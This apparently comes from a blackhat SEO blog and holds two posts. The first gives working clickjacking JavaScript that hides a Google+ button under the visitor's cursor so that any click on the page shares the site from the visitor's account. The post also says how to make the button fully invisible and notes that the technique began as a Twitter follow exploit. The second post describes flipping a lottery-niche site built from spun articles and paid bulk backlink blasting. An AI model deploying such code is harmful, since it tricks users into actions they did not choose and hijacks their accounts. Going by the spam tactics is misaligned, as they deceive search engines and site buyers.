BlackHat SEO News & Reviews

Blackhat SEO products, resources and services

I have seen another thread here that provided code for clickjacking, but the code was very ugly.
What this does is creates a g+ button that follows your mouse cursor
around so when the person click on the site they are adding your site to
their g+ account sharing it with their friends. (if they are logged
into their google account)

This code needs to be edited, rite now its setup so you can see the g+ button just to show you how it works.
When you want to hide the g+ button simple change the line below:

Change: twitterFollowIframe.style.filter = ‘alpha(opacity=20)’;
To: twitterFollowIframe.style.filter = ‘alpha(opacity=0)’;

Also, you need to add to the script, rite now the page does not refresh
or add cookies to stop the people from clicking again and removing the
g+ from their account. This is just the basic setup, you will need to
add to it.

Ignore the “twitter” inside the code, this was created to exploit
twitters new one click follow button. Then noticed it could be used for
g+ as well.

Here’s a clean version:

Code:
<html>
<head>
<style>
</style>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js">
{lang: 'en'}
</script>
</head>
<center><h1>Google+ CJ Code</h1></center>

<div>
<g:plusone size="small"></g:plusone>
</div>

<script>
if (!document.getElementsByClassName){
    document.getElementsByClassName = function(classname){
        for (i=0; i<document.getElementsByTagName("*").length; i++)
        {
            if (document.getElementsByTagName("*").item(i).className == classname){
                return new Array(document.getElementsByTagName("*").item(i));
            }
        }
    }
}

var twitterFollowIframe = document.getElementById('___plusone_0');

function getDivId(){
    twitterFollowIframe = document.getElementById('___plusone_0');
    if(twitterFollowIframe == null){
        setTimeout("getDivId()",200);
    }else{
        twitterFollowIframe.style.position = 'absolute';
        twitterFollowIframe.style.opacity = '0.2';
        twitterFollowIframe.style.filter = 'alpha(opacity=20)';
    }
}

getDivId();

document.onmousemove = function(e){
    if ( !e ) e = window.event;
    if(twitterFollowIframe != null){
        twitterFollowIframe.style.left = e.clientX - 15;
        twitterFollowIframe.style.top = e.clientY - 10;
    }
}
</script>
</html>

I’m not taken credit for this, simply sharing.
This must be upload, it wont work on your desktop.



SEO is short for Search Engine Optimisation. It is the process with which the visibility of website is enhanced on search engine rankings. The buzz of the website can be judged through its ranking to the search engines. Put simply, people can visit your website only when your website is ranking topside connection between serps, [...]

For the past few weeks I wanted to start something new, since everything
that I want to do has been requested from many followers I would love
to share what I am going to do live(not sure if the its proper word but
you get my point) and uncensored!

This is what I am planning to do, recently I have been playing around
with Flippa.com, purchased a website for about $80 and though it was
cheap in my perspective for the amount of work was put into it. I had
the curiosity of trying to sell a website too as well to see how it
goes.

I have seen websites sell for $100k and this sites barely make $1k/month.
Imagine if I had to sell my website that make me 3k-4k/month, and of course I am not planning to sell my website.

So this What I was planning to do:

  1. Select a niche
  2. Buy domain
  3. Set up wordpress
  4. on/off site SEO
  5. Get good ranking
  6. Flip it!

So far what I have done:

Already selected a niche: Lottery

I went to clickbank and checked into the betting section. Obviously the
lottery niche are the most popular one. So I decided to go for the
Lottery niche since its proven to convert.

Already did my keyword research:
Main Keyword: Lottery Strategies [Broad Searches] 12,100
For some reason the exact searches are not showing right now.
from this point I have already did some digging to get more keywords which I will share as well.

Already bought a domain and set up WP:

Code:
http://www.TheLotteryStrategies.com

I bought the following temple because I liked it and it looks professional:
Black Sakura WP

Code:
http://themeforest.net/item/black-sakura-wp/224440

I set up the following wp plugins:

  • SEOpressor
  • MaxBlogPress N!nja affiliate
  • Contact Form 7
  • 404-to-start
  • Ping Optimizer
  • Auto Excerpt
  • Google Sitemaps

I currently post 3 spun articles for the following keywords and made some changes according to SEOpressor:

  • Lottery Strategies
  • How to win lottery
  • Howto win the lottery

This were all posted in different dates and will of course go with more
articles as well but everything take its own time to do so.

I already pay for Dripable.com back linking service. I have the 1000link/day package.

So I just set up the few first blasts.

Every Wednesday for a month I will bast the URLs, not the Domain.
So I will be blasting the Lottery Strategies article 1000/day every Wednesday.
I will Blast 500/day on Thursday and Friday on each of the remaining articles.

Note: I am blasting the Post URLS and not the Domains.
Follow me and we will see what happens.



This site serves as a source of truth regarding tools, products, and services of interest to marketers who use “black hat” tactics.

_______________________________________________

Enter your email address for instant notification of the latest posts and private "VIP Membership" specials:

We will NEVER spam you or share your info with ANYONE!

Delivered by FeedBurner